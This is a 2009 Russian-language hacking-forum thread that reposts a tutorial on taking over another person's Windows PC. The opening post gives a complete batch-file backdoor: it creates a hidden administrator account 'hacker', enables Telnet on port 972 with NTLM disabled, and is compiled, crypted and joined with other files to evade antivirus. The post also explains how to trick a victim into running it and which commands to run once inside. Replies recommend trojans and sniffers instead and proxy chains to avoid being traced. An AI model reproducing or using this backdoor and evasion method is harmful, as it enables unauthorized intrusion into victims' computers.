MegaChiter

Объявление

Кто хочет открыть хайд старых тем пишем админу в ЛС с ссылкой на тему.

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » MegaChiter » Другое » Отдаляемся от дюпов и скриптов...


Отдаляемся от дюпов и скриптов...

Сообщений 1 страница 10 из 10

1

Вся информация отредактирована TomaToм тоесть мной)) для портала http://megachiter.ru

Скрытый текст:

Для просмотра скрытого текста - войдите или зарегистрируйтесь.

После внедрения на свой новый акаунт можете делать все что угодно) а так же Вот эту дрянь)

0

2

8tomat8 написал(а):

Вся информация отредактирована TomaToм тоесть мной)) для портала -- конечно же интересует взлом акаунтов)В этой теме будет описано как "в домашних условиях" завладеть компом "лузера"
            Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет.
            Телнет - сетевой протокол для работы в удаленной системе в терминальномрежиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,позволяющая нам подключаться к удаленным компьютерам.
            Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать ужертвы. Бывает такое, что этот сервис уже будет весить у "врага", но при попыткиподключится 90% того, что он потребует пасс, можно конечно попробовать брутить,но вероятность успеха очень маленькая. Для взлома можно воспользоваться такимметодом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое.Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этотметод в данном случае наиболее актуален.Для того, чтобы открыть телнет, жертве необходимо будет запустить созданыйтобой файл, который ей можно подарить. При запуске его он пропишит нужный тебепорт, на котором будет висеть телнет, нужный логин и пасс. Его можно запростонаписать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим команднойстроки).тело батника:
            chcp 1251net user SUPPORT_388945a0 /deletenet user hacker hack /addnet localgroup Администраторы hacker /addnet localgroup Пользователи SUPPORT_388945a0 /delregedit /s conf.regsc config tlntsvr start= autotlntadmn config port=972 sec=-NTLMnet start Telnet
            все это пишешь в блокноте, и сохраняем как *.bat
            Теперь пояснения:chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.net user SUPPORT_388945a0 /delete иnet localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартнуюпервоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.net user hacker hack /add иnet localgroup Администраторы hacker /add - не трудно догадаться, что этимикомандами создаётся новая учетная запись с админскими правами,где логин: hackerпасс: hackТак как при создании нового админа он будет виден в welcome screen'е, отключить егоможно импортироваврег файл в реестр, следующего содержания:Содержимое conf.reWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserLis t]"hacker"=dword:00000000Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start=auto котораяменяет тип его запуска на автоматический(по дефолту disabled ).При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы этопалевно, поэтому советую прописывать этой командой tlntadmn config port=972sec=-NTLM , редко используемый порт. В нашем случае это 972.Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnetокончательно запустит наш бэкдор.
            теперь проверим правильный ли синтаксис кода. Открываем командную строку, еслиона потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код,запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так:Пуск -> Выполнить -> пишем services.msc -> OkТам ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, исмотришь её свойства. При необходимости в любой момент можно её отключить.
            Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетаетконсольное черное окно, говорящее о выполняемых процессах в командной строке. Ноне все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler http://ifolder.ru/7197807. Онакомпилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батникпревратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле.Вроде готово... Но не совсем, ты же не будешь дарить пустой экзешник, поэтомубери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можноскачать тут http://ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь http://ifolder.ru/7197872RedBindeR_v1.3_Mod(460 кб) . Они помогут тебе склеить файлы в один и изменитьсигнатуру дабы не палится антивирусами.Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвытебе осталось только подключится к телнету через указанный тобой порт. Бываеттак что жертва находится в глобальной сети www у которой IP динамический, в этомслучаи, зная диапазон IP его провайдера можно просканировать эту сеть наоткрытый наш редко используемый 972 Порт. А чтобы знать когда твой "друг"в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент.Осталось подключится. Для этого можешь выбрать стандартный виндосовскийклиент который находится тут c:WINDOWSsystem32telnet.exe.Запускаешь. Пишешь:Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]если пишет:Welcome to Microsoft Telnet Servicelogin:_то всё акей =))Вводишь:login: hackerpassword: hackПоявляется надпись:*=====================================================Вас приветствует Telnet-сервер производства корпорации Майкрософт*=====================================================C:>_
            Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешьуправлять кампом, отдавая команды...Можно к примеру расшарить диски:
            C:>net share disk_c=c: > nulC:>net share disk_d=d: > nulC:>net share disk_e=e: > nul
            перезагрузить комп:C:>shutdown -r -t 1 -c -f
            прописать какой-нибудь ключ реестра:C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /vDisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему
            или поднять ftp сервер и залить радмина для более удобного удаленногоадминистрирования:C:>ftpВ общем-то, здесь уже играет фантазия взломщика =)
            Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.
            P.S. На все непонятные термины и выражения есть Гугл.
            Внимание!!! Данная статья - это не побуждение к действию, все описанное здесьпопадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашейинформационной безопасности.Источник http://www.hackzona.ru
            После внедрения на свой новый акаунт можете делать все что угодно) а так же Вот эту дрянь)

Блин это все долго...лу4ше крысу кинуть...или снифер...но инфа поленая...пасиб:)

Отредактировано SandeL (2009-05-02 10:36:27)

0

3

Надо было хотяб хайд поставить

0

4

Кстати,шас "клей" на компе поишу...найду выложу

0

5

SandeL написал(а):

Блин это все долго...лу4ше крысу кинуть

Это гораздо надежней) тут не требуется участие того кого кидаем... он даже не роздуплится до последнего момента что сучилось)

0

6

8tomat8 написал(а):

Это гораздо надежней) тут не требуется участие того кого кидаем... он даже не роздуплится до последнего момента что сучилось)

Ну вобшем да,пусть кароч ламеры учатся...потом нас ломать будут:D

0

7

очень позновательно жаль в школе детей такому не учат :-) на это есть megachiter.ru )))
1 вопрос какова вероятность спалица?(я уже очкую :D  ) если все правильно сделал
админ прав сделай хайд)))

Отредактировано zAzor (2009-05-11 05:22:17)

0

8

zAzor написал(а):

очень позновательно жаль в школе детей такому не учат  на это есть megachiter.ru )))  1 вопрос какова вероятность спалица?(я уже очкую   ) если все правильно сделаладмин прав сделай хайд)))

Если будешь кидать трой..то ты спалишься если у него антивирь новый...а так вобше куй кто чо скажет...

8tomat8 написал(а):

он даже не роздуплится до последнего момента что сучилось)

0

9

zAzor написал(а):

1 вопрос какова вероятность спалица?(я уже очкую :D  ) если все правильно сделал

Сделай цепочку проксей и х*я он тебя найдет даже при большом желании))) вот я выложил 5997 свежих проксей)))) не забываем тыкать ++++)))

zAzor написал(а):

админ прав сделай хайд)))

ладно... задолбали((( ставлю 150

0

10

8tomat8

Тему мну кажется закрыть надо..

0


Вы здесь » MegaChiter » Другое » Отдаляемся от дюпов и скриптов...